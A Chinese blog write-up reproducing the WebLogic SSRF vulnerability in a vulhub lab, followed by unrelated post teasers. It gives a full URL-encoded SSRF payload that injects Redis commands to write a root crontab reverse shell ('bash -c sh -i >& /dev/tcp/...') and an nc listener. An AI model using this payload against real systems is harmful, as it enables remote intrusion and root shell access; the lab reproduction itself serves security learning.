当前位置：首页 > news >正文

【漏洞复现】weblogic-SSRF漏洞

news 2025/12/18 10:42:07

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规

文章目录

- - 漏洞测试
  - - 注入HTTP头，利用Redis反弹shell
  - 问题解决

Path : vulhub/weblogic/ssrf

编译及启动测试环境

docker compose up -d

Weblogic中存在一个SSRF漏洞，利用该漏洞可以发送任意HTTP请求，进而攻击内网中redis、fastcgi等脆弱组件

访问http://127.0.0.1:7001/uddiexplorer/，无需登录即可查看uddiexplorer应用

在这里插入图片描述

点击Search Public Registries

在这里插入图片描述

来到http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp页面

在这里插入图片描述

漏洞测试

打开BurpSuite测试，点击Search按钮

Ctrl+r发送到Repeater模块，观察数据包

在这里插入图片描述

根据数据包的响应信息，可以猜测operator参数后面可以跟一个url地址

利用dnslog平台测试，生成一个域名

在这里插入图片描述

成功解析到，说明operator后面可以做url地址请求，说明存在SSRF 漏洞

在这里插入图片描述

访问一个可以访问的IP:PORT，如http://127.0.0.1:80

在这里插入图片描述

发现80端口没有开放

在访问7001端口，

在这里插入图片描述

通过错误的不同，即可探测内网状态。

环境是在docker上启动的，（docker环境的网段一般是172.*）

在这里插入图片描述

注入HTTP头，利用Redis反弹shell

发送三条redis命令，将弹shell脚本写入/etc/crontab：

反弹到kali上

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.80.141/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意，换行符是“\r\n”，也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面，发送：

http://172.19.0.2:6379/saury%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Asaury

kali开启监听：

nc -lvvp 21

bp发送请求

在这里插入图片描述

等待计划任务生效

在这里插入图片描述

成功拿到shell

问题解决

在使用sudo docker-compose up -d启动环境的时候，只启动了weblogic，没有启动redis

在这里插入图片描述

修改如下配置

vim /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="vsyscall=emulate"

在这里插入图片描述

:wq保存后，命令行运行update-grub

reboot重启，redis成功启动

解决方法来自:https://blog.csdn.net/weixin_43886198/article/details/111144854

【漏洞复现】weblogic-SSRF漏洞

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规文章目录漏洞测试注入HTTP头，利用Redis反弹shell 问题解决 Path : vulhub/weblogic/ssrf 编译及启动测试环境 docker compose up -dWeblogic中存在一个SSRF漏洞&#xff0…...

编程日记 2023/11/6 12:56:14

FreeSWTCH dialplan check nosdp

应朋友要求写一段dialplan，如果没有sdp（sip_profile打开了3pcc），马上回486，当然如果有sdp，dialplan正常往下走我试了试，貌似不太复杂，如下： <!-- check no sdp --&…...

编程日记 2023/11/6 12:55:12

微信小程序案例3-1 比较数字

文章目录一、运行效果二、知识储备（一）Page()函数（二）数据绑定（三）事件绑定（四）事件对象（五）this关键字（六）setData()方法&#xff0…...

编程日记 2023/11/6 12:54:11

哈希表----数据结构

引入如果你是一个队伍的队长，现在有 24 个队员，需要将他们分成 6 组，你会怎么分？其实有一种方法是让所有人排成一排，然后从队头开始报数，报的数字就是编号。当所有人都报完数后，这 24 人也被分…...

编程日记 2023/11/6 12:51:07

可达矩阵-邻接矩阵-以及有向图的python绘制

参考1 自定义输入矩阵来绘制根据参考代码， 自定义代码如下： # 编程实现有向图连通性的判断 from pylab import mplmpl.rcParams[font.sans-serif] [SimHei] mpl.rcParams[axes.unicode_minus] False import numpy as np import networkx as nx imp…...

编程日记 2023/11/6 12:49:05

1、config/webpack.config.js中找到alias，添加: path.resolve(src) ，如下： alias: {// Support React Native Web// https://www.smashingmagazine.com/2016/08/a-glimpse-into-the-future-with-react-native-for-web/"react-native&qu…...

编程日记 2023/11/6 12:48:04

C++性能优化笔记-6-C++元素的效率差异-7-类型转换

C元素的效率差异类型转换signed与unsigned转换整数大小转换浮点精度转换整数到浮点转换浮点到整数转换指针类型转换重新解释对象的类型const_caststatic_castreinterpret_castdynamic_cast转换类对象类型转换在C语法中，有几种方式进行类型转换： // …...

编程日记 2023/11/6 12:47:03

c#中switch常用模式

声明模式首先检查value的类型，然后根据类型输出相应的消息 public void ShowMessage(object value) {switch (value){case int i: Console.WriteLine($"value is int:{i}"); break;case long l: Console.WriteLine($"value is long:{l}"); b…...

编程日记 2023/11/6 12:46:01

Flink SQL 常用作业sql

目录 flink sql常用配置kafka source to mysql sink窗口函数开窗datagen 自动生成数据表tumble 滚动窗口hop 滑动窗口cumulate 累积窗口 grouping sets 多维分析over 函数TopN flink sql常用配置设置输出结果格式 SET sql-client.execution.result-modetableau;kafka source…...

编程日记 2023/11/6 12:45:00

nodejs国内镜像及切换版本工具nvm

淘宝 NPM 镜像站（http://npm.taobao.org）已更换域名，新域名： Web 站点：https://npmmirror.com Registry Endpoint：https://registry.npmmirror.com 详见： 【望周知】淘宝 NPM 镜像换域名了&…...

编程日记 2023/11/6 12:43:59

用Rust和Scraper库编写图像爬虫的建议

本文提供一些有关如何使用Rust和Scraper库编写图像爬虫的一般建议： 1、首先，你需要安装Rust和Scraper库。你可以通过Rustup或Cargo来安装Rust，然后使用Cargo来安装Scraper库。 2、然后，你可以使用Scraper库的Crawler类来创建一个…...

编程日记 2023/11/6 12:42:58

Java 语言环境搭建

JDK 是一种用于构建在 Java 平台上发布的应用程序、Applet 和组件的开发环境，即编写 Java 程序必须使用 JDK，它提供了编译和运行 Java 程序的环境。在安装 JDK 之前，首先要到 Oracle 网站获取 JDK 安装包。JDK 安装包被集成在 Java SE 中&a…...

编程日记 2023/11/6 12:41:57

酷开科技 | 酷开系统里萌萌哒小维在等你！

在一片金黄淡绿的颜色中，深秋的脚步更近了，在这个气候微凉的季节里，你是不是更想拥有一种温暖的陪伴呢？酷开科技智慧AI语音功能更懂你，贴心的小维用心陪伴你的每一天。 01.全天候陪伴在酷开系统中，只要你…...

编程日记 2023/11/6 12:40:56

Bash 4关联数组：错误“声明：-A：无效选项”

Bash 4 associative arrays: error “declare: -A: invalid option” 就是bash版本太低 1.先确定现在的版本 bash -version 我的就是版本太低升级新版本bash4.2 即可升级步骤 1.下载bash-4.2wget http://ftp.gnu.org/gnu/bash/bash-4.2.tar.gz 2. 下载完成解压 tar -zxvf…...

编程日记 2023/11/6 12:39:55

干货|AI辅助完成论文的正确打开方式！

论文写作中可能遇到问题 1. 选题问题：是否无法确定研究方向和选择合适的题目？ 2. 文献综述问题：是否困惑如何进行文献调研和综述？ 3. 方法论问题：是否不知道该选择何种研究方法？ 4. 数据处理问题&#…...

编程日记 2023/11/6 12:38:51

SpringBoot--Web开发篇：含enjoy模板引擎整合，SpringBoot整合springMVC；及上传文件至七牛云；restFul

SpringBoot的Web开发官网学习： 进入spring官网 --> projects --> SpringBoot --> LEARN --> Reference Doc. --> Web --> 就能看到上述页面静态资源映射规则官方文档总结： 只要是静态资源，放在类路径下&#xff1…...

编程日记 2023/11/6 12:37:50